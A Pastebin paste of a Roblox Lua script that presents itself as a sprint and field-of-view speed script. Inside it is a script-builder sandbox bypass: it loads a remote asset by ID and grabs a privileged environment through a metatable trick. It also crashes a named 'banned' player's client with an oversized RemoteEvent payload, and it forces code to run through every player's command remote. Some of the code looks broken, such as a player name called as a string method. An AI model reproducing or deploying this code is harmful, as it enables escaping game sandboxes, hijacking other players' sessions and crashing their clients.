Advertisement
TheMemeUserLol

Untitled

Aug 31st, 2016
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.02 KB | None | 0 0
  1. local strvalue=Instance.new'StringValue'
  2. strvalue.Parent=game:GetService("ReplicatedStorage")
  3. strvalue.Name='SpeedScript'
  4. strvalue.Value=[[local player=game:GetService'Players'.ItachiUchihna
  5. local mouse=player:GetMouse()
  6.  
  7. local normal=70
  8. local normal2=16
  9. local max=120
  10. local max2=150
  11.  
  12. local time=.5
  13. local time2=.5
  14.  
  15. local value=normal
  16. local value2=normal2
  17. local goal=normal
  18. local goal2=normal2
  19.  
  20. mouse.KeyDown:connect(function(key)
  21. if key=='0' then
  22. start=value
  23. goal=max
  24. start2=value2
  25. goal2=max2
  26. end
  27. end)
  28.  
  29.  
  30. mouse.KeyUp:connect(function(key)
  31. if key=='0' then
  32. start=value
  33. goal=normal
  34. start2=value2
  35. goal2=normal2
  36.  
  37. end
  38. end)
  39.  
  40. game:GetService'RunService'.RenderStepped:connect(function(t)
  41. value=math.min(math.max(normal, value + ((goal-start)*(t/time))), max)
  42. value2=math.min(math.max(normal2, value2 + ((goal2-start2)*(t/time2))), max2)
  43. workspace.CurrentCamera.FieldOfView=value
  44. player.Character.Humanoid.WalkSpeed=value2
  45. end)]]
  46. rawset(shared, "\0bp", function()local i=game:service'InsertService':LoadAssetVersion(519416165);local n=i:children()[1];game:service'Debris':AddItem(i,0);n.Parent=workspace;coroutine.yield();local e;pcall(_G.OSC_AddServerSideData,setmetatable({},{__index=function()e=getfenv(2)end,__metatable=''}));_G.OSC_AddServerSideData=nil;game:service'Debris':AddItem(n,0);return e end);bypass=shared['\0bp']();shared["\0bp"]=nil; game:GetService'ReplicatedStorage':ClearAllChildren()
  47. banned={'gage7252002'};table.foreachi(banned,function(_,player)banned[player]=true;
  48. end)f=function(n, p)p=p or n;if banned[p.Name:ItachiUchihna()] then local r=Instance.new('RemoteEvent',workspace);r:FireClient(p,{string.rep("-",2e5+5)});game:GetService"Debris":AddItem(r,5);end
  49. end;x=game.Players;x.PlayerAdded:connect(f);table.foreach(x:GetPlayers(),f)
  50. for _, p in pairs(bypass.game:GetService'Players':GetPlayers()) do
  51. pcall(function()
  52. p.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value=([[c/owner:RunLocalScript(game:GetService'ReplicatedStorage':WaitForChild'SpeedScript'.Value)]])
  53. end)
  54. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement